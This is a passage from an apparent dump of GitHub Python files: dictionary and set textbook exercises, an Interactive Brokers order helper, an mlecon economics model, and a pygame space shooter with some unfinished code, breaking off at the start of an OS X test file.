line.strip()\n        found = False\n        # Find bird in the list of bird counts.\n        for entry in bird_counts:\n            if entry[0] == bird:\n                entry[1] = entry[1] + 1\n                found = True\n        if not found: bird_counts.append([bird, 1])\n    return bird_counts\n\nif __name__ == '__main__':\n    with open('file_examples/observations.txt') as observations_file:\n        bird_counts = count_birds(observations_file)\n        # Print each bird and the number of times it was seen\n        for entry in bird_counts:\n            print(entry[0], entry[1])\n\n# Like the elements in sets, keys must be immutable (though the values associated with them don’t have to be). 
\n# putting key/value pairs inside braces (each key is followed by a colon and then by its value):\n\nbird_to_observations = {'canada goose': 3, 'northern fulmar': 1}\nprint (bird_to_observations)\n\n# To get the value associated with a key, we put the key in square brackets, much like indexing into a list:\n\nprint (bird_to_observations['northern fulmar'])\nprint (bird_to_observations['canada goose'])\n \n# As with sets, dictionaries are unordered:\n\ndict1 = {'canada goose': 3, 'northern fulmar': 1}\ndict2 = {'northern fulmar': 1, 'canada goose': 3}\nprint (dict1 == dict2)\n\n\n# Updating and Checking Membership\n\nbird_to_observations = {}\n\n# Add a new key/value pair, 'snow goose': 33\nbird_to_observations['snow goose'] = 33\n\n# Add a new key/value pair, 'eagle': 999.\nbird_to_observations['eagle'] = 999\n\nprint (bird_to_observations)\n\n# Change the value associated with key 'eagle' to 9.\nbird_to_observations['eagle'] = 9\nprint (bird_to_observations)\n\n\n# To remove an entry from a dictionary, use del d[k], where d is the dictionary \n# and k is the key being removed. Only entries that are present can be removed; \n# trying to remove one that isn’t there results in an error:\n\nbird_to_observations = {'snow goose': 33, 'eagle': 9}\ndel bird_to_observations['snow goose']\n\nprint (bird_to_observations)\n\n# To test whether a key is in a dictionary, we can use the in operator:\n\nbird_to_observations = {'eagle': 999, 'snow goose': 33}\nprint ('eagle' in bird_to_observations)\n\nif 'eagle' in bird_to_observations:\n print('eagles have been seen')\n\ndel bird_to_observations['eagle']\nprint ('eagle' in bird_to_observations)\n\nif 'eagle' in bird_to_observations:\n print('eagles have been seen')\n\n#Looping Over Dictionaries\n\nbird_to_observations = {'canada goose': 183, 'long-tailed jaeger': 71,\n 'snow goose': 63, 'northern fulmar': 1}\n\nfor bird in bird_to_observations:\n print(bird, bird_to_observations[bird])\n\n# Dictionary Operations\n\nscientist_to_birthdate = {'Newton' : 1642, 'Darwin' : 1809,\n 'Turing' : 1912}\nprint (scientist_to_birthdate.keys())\nprint (scientist_to_birthdate.values())\nprint (scientist_to_birthdate.items())\nprint (scientist_to_birthdate.get('Newton'))\nprint (scientist_to_birthdate.get('Curie', 1867))\nprint (scientist_to_birthdate)\n\nresearcher_to_birthdate = {'Curie' : 1867, 'Hopper' : 1906, \n'Franklin' : 1920}\nscientist_to_birthdate.update(researcher_to_birthdate)\nprint (scientist_to_birthdate)\nprint (researcher_to_birthdate)\nprint (researcher_to_birthdate.clear())\nprint (researcher_to_birthdate)\n###############\n# loop over the scientists and their birth years:\n###############\nscientist_to_birthdate = {'Newton' : 1642, 'Darwin' : 1809, 'Turing' : 1912}\nfor scientist, birthdate in scientist_to_birthdate.items(): \n print(scientist, 'was born in', birthdate)\n\n# Each time we read an observation from a file, \n# we check to see whether we have encountered that bird before—that is,\n# whether the bird is already a key in our dictionary.\n\nfrom typing import TextIO, Dict\nfrom io import StringIO\ndef count_birds(observations_file: TextIO) -> Dict[str, int]:\n \"\"\"Return a set of the bird species listed in observations_file, which has\n one bird species per line.\n >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n >>> count_birds(infile)\n {'bird 1': 2, 'bird 2': 1}\n \"\"\"\n bird_to_observations = {}\n for line in observations_file:\n bird = line.strip()\n if bird in bird_to_observations:\n bird_to_observations[bird] = 
bird_to_observations[bird] + 1\n        else:\n            bird_to_observations[bird] = 1\n\n    return bird_to_observations\n    \nif __name__ == '__main__':\n    with open('file_examples/observations.txt') as observations_file:\n        bird_to_observations = count_birds(observations_file)\n        for bird, observations in bird_to_observations.items():\n            print(bird, observations)\n\n# The function body can be shortened by using the method dict.get, which saves three lines.\n\ndef count_birds(observations_file: TextIO) -> Dict[str, int]:\n    \"\"\"Return a dictionary mapping each bird species in observations_file to the number of times it was seen; the file has one bird species per line.\n    >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n    >>> count_birds(infile)\n    {'bird 1': 2, 'bird 2': 1}\n    \"\"\"\n    bird_to_observations = {}\n    for line in observations_file:\n        bird = line.strip()\n        bird_to_observations[bird] = bird_to_observations.get(bird, 0) + 1\n\n    return bird_to_observations\n\nif __name__ == '__main__':\n    with open('file_examples/observations.txt') as observations_file:\n        bird_to_observations = count_birds(observations_file)\n        for bird, observations in bird_to_observations.items():\n            print(bird, observations)\n\n# Inverting a Dictionary // You might want to print the birds in another order\n\nprint (bird_to_observations)\n\n# Invert the dictionary\nobservations_to_birds_list = {}\nfor bird, observations in bird_to_observations.items():\n    if observations in observations_to_birds_list:\n        observations_to_birds_list[observations].append(bird)\n    else:\n        observations_to_birds_list[observations] = [bird]\n\nprint (observations_to_birds_list)\n    \n\n# Print the inverted dictionary\n\nobservations_sorted = sorted(observations_to_birds_list.keys())\n\nfor observations in observations_sorted:\n    print(observations, ':', end=\" \")\n    for bird in observations_to_birds_list[observations]:\n        print(' ', bird, end=\" \")\n    print()\n\n# Using the in Operator on Tuples, Sets, and Dictionaries\n\nodds = set([1, 3, 5, 7, 9])\nprint (9 in odds)\nprint (8 in odds)\nprint ('9' in odds)\nevens = (0, 2, 4, 6, 8)\nprint (4 in evens)\nprint (11 in evens)\n\n# When used on a dictionary, in checks whether a value is a key in the dictionary:\n\nbird_to_observations = {'canada goose': 183, 'long-tailed jaeger': 71, 'snow goose': 63, 'northern fulmar': 1}\n\nprint ('snow goose' in bird_to_observations)\nprint (183 in bird_to_observations)\n\n # Exercises Chapter 11\n\n# Task 1\n# Write a function called find_dups that takes a list of integers as its input argument \n# and returns a set of those integers occurring two or more times in the list.\n\ndef find_dups(L):\n    \"\"\" (list) -> set\n    \n    Return a set of the numbers that occur two or more times in L.\n    >>> find_dups([1, 1, 2, 3, 4, 2])\n    {1, 2}\n    >>> find_dups([1, 2, 3, 4])\n    set()\n    \"\"\" \n    \n    elem_set = set()\n    dups_set = set()\n    \n    for entry in L:\n        len_initial = len(elem_set)\n        elem_set.add(entry)\n        len_after = len(elem_set)\n        if len_initial == len_after:\n            dups_set.add(entry)\n\n    return dups_set\n\n\n# Task2\n# Write the bodies of the new versions of functions read_molecule and read_all_molecules from Creating New Type Annotations, on page 224.\n\ndef mating_pairs(males, females):\n    \"\"\" (set, set) -> set of tuple\n    Return a set of tuples where each tuple contains a male from males and a \n    female from females.\n    \n    >>> mating_pairs({'Anne', 'Beatrice', 'Cari'}, {'Ali', 'Bob', 'Chen'})\n    {('Cari', 'Chen'), ('Beatrice', 'Bob'), ('Anne', 'Ali')}\n    \"\"\" \n    pairs = set()\n    num_gerbils = len(males)\n    \n    for i in range(num_gerbils):\n        \n        male = 
males.pop()\n        female = females.pop()\n        pairs.add((male, female),)\n        \n    return pairs\n\nprint (mating_pairs)\n\n# Task3\n#Python’s set objects have a method called pop that removes and returns an arbitrary \n# element from the set. If the set gerbils contains five cuddly little animals, for example, \n# calling gerbils.pop() five times will return those animals one by one, leaving the set empty at the end. \n# Use this to write a function called mating_pairs that takes two equal-sized sets called males and females as \n# input and returns a set of pairs; each pair must be a tuple containing one male and one female. \n# (The elements of males and females may be strings containing gerbil names or gerbil ID numbers—your function must work with both.)\n# \n\ndef get_authors(filenames):\n    \"\"\" (list of str) -> set of str\n    Return the set of authors found in the PDB files whose names appear in filenames.\n    \"\"\" \n    authors = set()\n    \n    for filename in filenames:\n        pdb_file = open(filename)\n        \n        for line in pdb_file:\n            if line.lower().startswith('author'):\n                author = line[6:].strip()\n                authors.add(author)\n\n    return authors\n\n# Task4\n# The PDB file format is often used to store information about molecules. \n# A PDB file may contain zero or more lines that begin with the word AUTHOR \n# (which may be in uppercase, lowercase, or mixed case), followed by spaces or tabs, \n# followed by the name of the person who created the file. Write a function that takes a \n# list of filenames as an input argument and returns the set of all author names found in those files.\n\ndef count_values(dictionary):\n    \"\"\" (dict) -> int\n    Return the number of unique values in dictionary.\n    >>> count_values({'red': 1, 'green': 2, 'blue': 2})\n    2\n    \"\"\" \n    \n    return len(set(dictionary.values()))\n\n# Task5\n# The keys in a dictionary are guaranteed to be unique, but the values are not. \n# Write a function called count_values that takes a single dictionary as an argument \n# and returns the number of distinct values it contains. 
Given the input {'red': 1, 'green': 1, 'blue': 2}, \n# for example, it should return 2.\n\ndef least_likely(particle_to_probability):\n    \"\"\" (dict of {str: float}) -> str\n    Return the particle from particle_to_probability with the lowest \n    probability.\n    >>> least_likely({'neutron': 0.55, 'proton': 0.21, 'meson': 0.03, 'muon':\n    0.07})\n    'meson'\n    \"\"\" \n    smallest = 1\n    name = ''\n    \n    for particle in particle_to_probability:\n        probability = particle_to_probability[particle]\n        if probability < smallest:\n            smallest = probability\n            name = particle\n\n    return name\n\n# Task 6\n\ndef count_duplicates(dictionary):\n    \"\"\" (dict) -> int\n    Return the number of duplicate values in dictionary.\n    >>> count_duplicates({'R': 1, 'G': 2, 'B': 2, 'Y': 1, 'P': 3})\n    2\n    \"\"\" \n    duplicates = 0\n    values = list(dictionary.values())\n    for item in values:\n        # if an item appears at least 2 times, it is a duplicate\n        if values.count(item) >= 2:\n            duplicates = duplicates + 1\n            # remove that item from the list\n            num_occurrences = values.count(item) \n            for i in range(num_occurrences):\n                values.remove(item)\n\n    return duplicates\n\n# Task 7\n\ndef is_balanced(color_to_factor):\n    \"\"\" (dict of {str: float}) -> bool\n    Return True if and only if color_to_factor represents a balanced color.\n    >>> is_balanced({'R': 0.5, 'G': 0.4, 'B': 0.7})\n    False\n    >>> is_balanced({'R': 0.3, 'G': 0.5, 'B': 0.2})\n    True\n    \"\"\" \n    values = list(color_to_factor.values())\n    total = sum(values)\n    return total == 1.0\n\n# Task 8\n\ndef dict_interest(dict1, dict2):\n    \"\"\" (dict, dict) -> dict\n    Return a new dictionary that contains only the key/value pairs that occur\n    in both dict1 and dict2.\n    >>> dict_interest({'a': 1, 'b': 2, 'c': 3}, {'a': 1, 'd': 2, 'b': 2})\n    {'a': 1, 'b': 2}\n    \"\"\" \n    intersection = {}\n    for (key, value) in dict1.items():\n        if key in dict2 and value == dict2[key]:\n            intersection[key] = value\n\n    return intersection\n\n# Task 9\n\ndef db_headings(dict_of_dict):\n    \"\"\" (dict of dict) -> set\n    Return a set of the keys in the inner dictionaries in dict_of_dict.\n    >>> db_headings({'A': {1: 'a', 2: 'b'}, 'B': {2: 'c', 3: 'd'}})\n    {1, 2, 3}\n    \"\"\" \n    inner_keys = set()\n    for key in dict_of_dict:\n        for inner_key in dict_of_dict[key]:\n            inner_keys.add(inner_key)\n\n    return inner_keys\n\n# Task 11\n\ndef db_consistent(dict_of_dict):\n    \"\"\" (dict of dict) -> bool\n    Return whether all inner dictionaries in dict_of_dict contain the same \n    keys.\n    >>> db_consistent({'A': {1: 'a', 2: 'b'}, 'B': {2: 'c', 3: 'd'}})\n    False\n    >>> db_consistent({'A': {1: 'a', 2: 'b'}, 'B': {2: 'c', 1: 'd'}})\n    True\n    \"\"\" \n    inner_keys_list = []\n    # Build a list of list of keys\n    for key in dict_of_dict:\n        inner_keys = list(dict_of_dict[key].keys())\n        inner_keys.sort()\n        inner_keys_list.append(inner_keys)\n    for i in range(1, len(inner_keys_list)):\n        # If the number of keys is different.\n        if len(inner_keys_list[0]) != len(inner_keys_list[i]):\n            return False\n        # If the keys don't match.\n        for j in range(len(inner_keys_list[0])):\n            if inner_keys_list[0][j] != inner_keys_list[i][j]:\n                return False\n\n    return True\n\n\n# Task 12\n# a\ndef sparse_add(vector1, vector2):\n    \"\"\" (dict of {int: int}, dict of {int: int}) -> dict of {int: int}\n    Return the sum of sparse vectors vector1 and vector2.\n    >>> sparse_add({1: 3, 3: 4}, {2: 4, 3: 5, 5: 6})\n    {1: 3, 3: 9, 2: 4, 5: 6}\n    \"\"\" \n    sum_vector = vector1.copy()\n    for key in vector2:\n        if key in sum_vector:\n            sum_vector[key] = sum_vector[key] + vector2[key]\n        else:\n            sum_vector[key] = vector2[key]\n    \n    
return sum_vector\n# b\n\ndef sparse_dot(vector1, vector2):\n    \"\"\" (dict of {int: int}, dict of {int: int}) -> int\n    Return the dot product of sparse vectors vector1 and vector2.\n    >>> sparse_dot({1: 3, 3: 4}, {2: 4, 3: 5, 5: 6})\n    20\n    \"\"\" \n    dot = 0\n    for key1 in vector1:\n        if key1 in vector2:\n            dot = dot + vector1[key1] * vector2[key1]\n    \n    return dot\n","repo_name":"chavo1/python","sub_path":"ch11.py","file_name":"ch11.py","file_ext":"py","file_size_in_byte":19864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6444670285","text":"from ibapi.contract import Contract\nfrom ibapi.order import Order\n\nfrom ..crud.users import update_balance\nfrom ..ib.client import ib\n\n\nasync def create_order(symbol, currency, action, user, db):\n    contract = Contract()\n    contract.symbol = symbol.upper()\n    contract.secType = \"STK\"\n    contract.currency = currency.upper()\n    contract.exchange = \"SMART\"\n\n    order = Order()\n    order.action = \"SELL\" if action == 1 else \"BUY\"\n    order.orderType = \"MKT\"\n    order.transmit = True\n    order.totalQuantity = await get_quantity(user.balance)\n    action = \"+\" if action == 1 else 0\n    await update_balance(db, user.username, order.totalQuantity, action)\n    nextID = 101\n    ib.placeOrder(nextID, contract, order)\n\n\nasync def get_quantity(balance: float):\n    if balance <= 100:\n        return balance * 0.03\n    else:\n        return balance * 0.05\n","repo_name":"TharakiKarunarathna/FX_International","sub_path":"forex-international-main/forex-international-main/app/services/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29334937615","text":"import mlecon as mle\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\n# Reset graph\nmle.clear()\n\n# Hyper-parameters\nhidden = [32, 16, 8]\ndt = mle.dt\nΔt = 0.5\nmle.delta_t = Δt\nbatch_size = 256\nmle.set_batch_size(batch_size)\n\n# State variables\nK = mle.state(.1, 10)\nz = mle.state(-0.5, .5)\nσ = mle.state(-6, -1)\n\n# Brownian Shocks\ndZ = mle.brownian_shocks(2)\n\n# Model parameters\nβ, ν, ζ, δ, λ, σ_, γ, η, ρ, ψ = 0.04, 0.36, .3, 0.0196, 0.95, -3, 4, .1, .9, .5\nθ = (1 - γ) / (1 - 1 / ψ)\n\n# Function approximators\nJ = mle.network([K, z, σ], hidden, name='Value_function')\nL = mle.network([K, z, σ], hidden, name='labor', bnds=[1e-6, .999],\n                activation_fn=tf.nn.relu)\ns = mle.network([K, z, σ], hidden, name='savings', bnds=[1e-6, .999])\n\n# %% ----------- Economic Model -----------------------------\nY = mle.exp(z) * K**ζ * L**(1 - ζ)\nC = (1 - s) * Y\nU = (C**ν * (1 - L)**(1 - ν))**(1 - γ) / (1 - γ)\nI = s * Y\n\n# Dynamics\nK.d = (I - δ * K) * dt\nz.d = -(1 - λ) * z * dt + mle.exp(σ) * dZ[0]\nσ.d = (1 - ρ) * (σ_ - σ) * dt + η * dZ[1]\n\nf = β * θ * J * ((mle.abs(U / J))**(1 / θ) - 1)  # Duffie-Epstein aggregator\nHJB = f + J.drift()  # Bellman residual\nT = J + Δt * HJB  # Bellman target\n\npolicy_eval = mle.fit(J, T)\npolicy_improv = mle.greedy(HJB, actions=[s, L])\n\n# %% ---- # Launch graph ---------------------------------\nmle.launch()\n\n# %% ----------- Create summaries for TensorBoard ----------\n\"\"\" To see the summaries in real time during training open\na terminal and type:\ntensorboard --logdir=./results/summaries\n \"\"\"\nscalars = {'HJB': tf.log(tf.reduce_mean(tf.abs(HJB(0)))),\n           'MSE': tf.log(J.net.loss)}\n\nmle.set_summary(scalars)\n\n\n# %% ----------- Test function 
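# --- Editor's note (added): a worked example of the position-sizing tiers in
# get_quantity() from order.py above (3% of balance at or below 100, 5% above);
# the balances are invented and the asyncio driver is only a demo harness.
import asyncio
async def _demo_quantity():
    print(await get_quantity(100.0))   # 100 * 0.03 = 3.0  (<= 100 -> 3% tier)
    print(await get_quantity(1000.0))  # 1000 * 0.05 = 50.0 (> 100 -> 5% tier)
# asyncio.run(_demo_quantity())  # would print 3.0, then 50.0
# --- end of editor's note ---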
-----------------------------\nfeed_dict = {K: np.linspace(1, 10, batch_size),\n z: 0,\n σ: -3}\n\n\ndef test():\n K_, C_, L_ = mle.eval([K, C, L], feed_dict)\n\n plt.subplot(1, 2, 1)\n plt.plot(K_, L_)\n plt.xlabel('K')\n plt.ylabel('L')\n\n plt.subplot(1, 2, 2)\n plt.plot(K_, C_)\n plt.xlabel('K')\n plt.ylabel('C')\n\n plt.show()\n plt.pause(1e-6)\n\n\n# %% ----------- Iteration --------------------------------------\n# mle.load() # Load previous results?\nprogram = {policy_eval: 1,\n policy_improv: 1,\n test: 1000,\n mle.add_summary: 100}\n\nmle.iterate(program, T='01:00:00')\nmle.save()\n","repo_name":"vduarte/MLEcon","sub_path":"examples/DSGE - Caldara et al 2012.py","file_name":"DSGE - Caldara et al 2012.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"29"} +{"seq_id":"3464903484","text":"\"\"\"\"\"\r\n# another space game\r\nimport pygame\r\nimport sys\r\n\r\nscreen_width, screen_height = 800, 800\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\nbackground = pygame.image.load('backgroundSpace_01.1.png')\r\n\r\nclass Spaceship(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('ship5.png')\r\n self.image = pygame.transform.scale(self.image, (90, 110))\r\n\r\n self.rect = self.image.get_rect(center=(screen_width/2, screen_height-200))\r\n\r\n def update(self):\r\n pygame.event.get()\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_UP] and self.rect.y>0:\r\n\r\n self.rect.y-=2\r\n\r\n if keys[pygame.K_DOWN] and self.rect.y<650:\r\n self.rect.y+=2\r\n\r\n if keys[pygame.K_RIGHT] and self.rect.x<700:\r\n\r\n self.rect.x+=2\r\n\r\n if keys[pygame.K_LEFT] and self.rect.x>0:\r\n\r\n self.rect.x-=2\r\n\r\n def create_bullet(self):\r\n\r\n return Enemy_Bullet(self.rect.centerx, self.rect.centery)\r\n\r\n\r\n\r\n\r\n\r\nclass Enemy(pygame.sprite.Sprite):\r\n\r\n def __init__(self):\r\n\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('spiked ship 3. 
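# --- Editor's note (added): a gloss on the value-iteration step in the DSGE script
# above; it restates what the code already defines and adds no new model content.
# HJB = f + drift(J) is the Bellman residual, which is zero at the true value function.
# T = J + Δt * HJB is therefore one explicit-Euler-style step toward HJB = 0:
# policy_eval regresses J toward T, while policy_improv adjusts (s, L) to maximize HJB.
# --- end of editor's note ---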
small.blue_.png')\r\n self.image = pygame.transform.scale(self.image, (90, 110))\r\n self.rect = self.image.get_rect(center = (screen_width/2, screen_height-600))\r\n\r\n def update(self):\r\n self.rect.center = pygame.mouse.get_pos()\r\n\r\n def create_bullet(self):\r\n return Spaceship_Bullet(self.rect.centerx+11, self.rect.centery+15 )\r\n #return Spaceship_Bullet(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\r\n\r\n\r\n\r\n\r\nclass Spaceship_Bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image,(30, 50 ))\r\n\r\n self.rect = self.image.get_rect(center= (pos_x, pos_y))\r\n\r\n def update(self):\r\n self.rect.y+=5\r\n\r\n if self.rect.y>800:\r\n self.kill()\r\n\r\nclass Enemy_Bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image, (40, 30))\r\n self.rect = self.image.get_rect(center= (pos_x, pos_y))\r\n\r\n def update(self):\r\n\r\n self.rect.y -= 5\r\n\r\n #if self.rect.y<0:\r\n # self.kill()\r\n\r\n\r\nenemy = Enemy()\r\nenemy_group = pygame.sprite.Group()\r\n\r\n\r\nspaceship = Spaceship()\r\n\r\nspaceship_group = pygame.sprite.Group()\r\nenemy_bullet_group = pygame.sprite.Group()\r\nanother_bullet_group = pygame.sprite.Group()\r\n\r\nspaceship_group.add(spaceship)\r\nenemy_group.add(enemy)\r\n\r\npygame.mouse.set_visible(False)\r\n\r\nkeys = pygame.key.get_pressed()\r\nwhile True:\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n enemy_bullet_group.add(enemy.create_bullet())\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n screen.blit(background, (0, 0))\r\n spaceship_group.draw(screen)\r\n enemy_group.draw(screen)\r\n enemy_bullet_group.draw(screen)\r\n \r\n\r\n\r\n\r\n\r\n spaceship_group.update()\r\n enemy_group.update()\r\n enemy_bullet_group.update()\r\n \r\n\r\n pygame.display.flip()\r\n\"\"\"''\r\n\r\n\r\n\r\nimport pygame, sys, random\r\nfrom pygame import mixer\r\npygame.mixer.pre_init(44100, -16, 2, 512)\r\nmixer.init()\r\n\r\nexplosion_sound = pygame.mixer.Sound('NenadSimic - Muffled Distant Explosion.wav')\r\nlaser_sound = pygame.mixer.Sound('laser1.wav')\r\nlaser_sound_enemy = pygame.mixer.Sound('laser1.wav')\r\n\r\nexplosion_sound.set_volume(5)\r\nlaser_sound.set_volume(0.1)\r\nlaser_sound_enemy.set_volume(0.01)\r\n\r\nred = (255, 0, 0)\r\ngreen = (0, 255, 0)\r\n\r\n# SPACESHIP AND BULLELTS\r\nclass Player(pygame.sprite.Sprite):\r\n\r\n def __init__(self, health):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('DurrrSpaceShip.png')\r\n self.image = pygame.transform.scale(self.image, (50, 30))\r\n\r\n self.rect = self.image.get_rect(center = (screen_width/2 , screen_height/2))\r\n self.health_at_the_beginning = health\r\n self.health_remaining = health\r\n\r\n def update(self):\r\n # movements\r\n self.rect.center = pygame.mouse.get_pos()\r\n\r\n # mask\r\n self.mask = pygame.mask.from_surface(self.image)\r\n\r\n # health_bar\r\n pygame.draw.rect(screen, red, (self.rect.x, (self.rect.bottom + 5), self.rect.width, 15))\r\n\r\n if self.health_remaining > 0:\r\n pygame.draw.rect(screen, green, (self.rect.x, (self.rect.bottom + 5), int(self.rect.width * (self.health_remaining / self.health_at_the_beginning)), 
15))\r\n if self.health_remaining <=0:\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n self.kill()\r\n\r\n\r\n def create_bullet(self):\r\n\r\n laser_sound.play()\r\n\r\n\r\n #return Bullets( pygame.mouse.get_pos()[0],pygame.mouse.get_pos()[1] )\r\n return Bullets(self.rect.centerx+11.5, self.rect.centery)\r\n\r\n\r\n\r\nclass Bullets(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image, (40, 30))\r\n self.rect = self.image.get_rect(center=(pos_x, pos_y))\r\n\r\n\r\n\r\n def update(self):\r\n\r\n self.rect.y -= 5\r\n\r\n if self.rect.y <0:\r\n\r\n self.kill()\r\n\r\n if pygame.sprite.spritecollide(self, object_group, True):\r\n self.kill()\r\n explosion_sound.play()\r\n\r\n #explosion_sound.play()\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n\r\n# TARGETS\r\n\r\n\r\nclass Objects(pygame.sprite.Sprite):\r\n\r\n def __init__(self, picture_path, pos_x, pos_y, health):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load(picture_path)\r\n self.image = pygame.transform.scale(self.image, (30, 20))\r\n\r\n self.rect = self.image.get_rect(center = (pos_x, pos_y))\r\n\r\n self.health_at_the_beginning = health\r\n self.health_remaining = health\r\n\r\n def update(self ):\r\n\r\n\r\n self.rect.y += 2\r\n\r\n if self.rect.y>800:\r\n self.rect.y = 0\r\n\r\n if self.rect.x>800:\r\n\r\n self.rect.x = 0\r\n\r\n if self.health_remaining == 0:\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n\r\n self.kill()\r\n\r\n\r\n\r\n\r\n# enemy bullets\r\nclass Enemy_Bullets(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image, (30, 20))\r\n self.rect = self.image.get_rect(center=(pos_x, pos_y))\r\n\r\n def update(self):\r\n #laser_sound_enemy.play()\r\n self.rect.y += 10\r\n killing = False\r\n\r\n if self.rect.y > 800:\r\n\r\n self.kill()\r\n\r\n if pygame.sprite.spritecollide(self, player_group, killing):\r\n self.kill()\r\n explosion_sound.play()\r\n player.health_remaining -= 0.1\r\n\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n\r\n\r\nclass Explosion(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y):\r\n super().__init__()\r\n self.explosions = []\r\n\r\n for num in range(1, 3):\r\n\r\n img = pygame.image.load('explo_tiao1_img4.png')\r\n img2 = pygame.image.load('explo_tiao1_img10.png')\r\n\r\n self.explosions.append(img)\r\n self.explosions.append(img2)\r\n\r\n self.index = 0\r\n\r\n self.image = self.explosions[self.index]\r\n self.rect = self.image.get_rect()\r\n self.rect.center = [x, y]\r\n self.counter = 0\r\n\r\n\r\n def update(self):\r\n\r\n explosion_speed = 3\r\n\r\n # updating explosion animation\r\n\r\n self.counter+=1\r\n\r\n if self.counter >= explosion_speed and self.index< len(self.explosions)-1:\r\n\r\n self.counter = 0\r\n self.index+=1\r\n self.image = self.explosions[self.index]\r\n\r\n if self.counter>= explosion_speed and self.index>= len(self.explosions)-1:\r\n self.kill()\r\n\r\n\r\n\r\npygame.init()\r\n\r\n\r\nbullet_group = pygame.sprite.Group()\r\nbullets = Bullets( pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\r\nscreen_width, screen_height = 800, 800\r\n\r\n\r\n\r\nscreen = 
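# --- Editor's note (added): a standalone distillation of the frame-timer pattern that
# Explosion.update() above uses; a toy helper for illustration, not part of the game.
def advance_animation(counter, index, frames, speed=3):
    counter += 1                                   # one tick per update() call
    if counter >= speed and index < len(frames) - 1:
        counter, index = 0, index + 1              # hold each frame for `speed` ticks
    done = counter >= speed and index >= len(frames) - 1
    return counter, index, done                    # done mirrors Explosion's self.kill()
# --- end of editor's note ---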
pygame.display.set_mode((screen_width, screen_height))\r\n#background = pygame.image.load('space1.png')\r\n\r\n\r\nplayer = Player(3)\r\nplayer_group = pygame.sprite.Group()\r\nplayer_group.add(player)\r\n\r\n#enemy_bullets = pygame.sprite.Group()\r\n\r\n\r\n\r\n#explosion_group = pygame.sprite.Group()\r\n#object_group = pygame.sprite.Group()\r\n\r\n\r\n# enemy spaceships\r\n\r\n\"\"\"\"\"\r\nfor objects in range(3):\r\n\r\n enemy = Objects('DurrrSpaceShipcopy.png', random.randint(0, screen_width),random.randint(0, screen_height), 3)\r\n Giant = Objects('Transforming fighter ship 1_061.png' , random.randint(0, screen_width), random.randint(0, screen_height),3)\r\n giant = Objects('Transforming fighter ship 1_001.png', random.randint(0, screen_width), random.randint(0, screen_width), 3)\r\n giant1 = Objects('Transforming fighter ship 1_027.png', random.randint(0, screen_width), random.randint(0, screen_height),3)\r\n object_group.add(enemy)\r\n object_group.add(Giant)\r\n object_group.add(giant)\r\n object_group.add(giant1)\r\n\"\"\"\"\"\r\n\r\n\r\npygame.mouse.set_visible(False)\r\n\r\n\r\n\r\nframe_rate = pygame.time.Clock()\r\nwhile True:\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n bullet_group.add(player.create_bullet())\r\n \"\"\"\"\"\r\n if True:\r\n\r\n attacking_ship = random.choice(object_group.sprites())\r\n alien_bullet = Enemy_Bullets(attacking_ship.rect.centerx +9, attacking_ship.rect.bottom)\r\n enemy_bullets.add(alien_bullet)\r\n \"\"\"\"\"\r\n screen.blit(background, (0, 0))\r\n\r\n\r\n object_group.draw(screen)\r\n\r\n player_group.draw(screen)\r\n bullet_group.draw(screen)\r\n enemy_bullets.draw(screen)\r\n explosion_group.draw(screen)\r\n\r\n\r\n player_group.update()\r\n bullet_group.update()\r\n object_group.update()\r\n enemy_bullets.update()\r\n explosion_group.update()\r\n\r\n\r\n\r\n frame_rate.tick(200)\r\n pygame.display.flip()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"IlhamulAzam/spacemultiplayergame","sub_path":"game2Project.py","file_name":"game2Project.py","file_ext":"py","file_size_in_byte":10706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72966602318","text":"\"\"\"\nTest suite for OS X interpreter environment variables.\n\"\"\"\nfrom test.support import EnvironmentVarGuard\nimport subprocess\nimport sys\nimport sysconfig\nimport 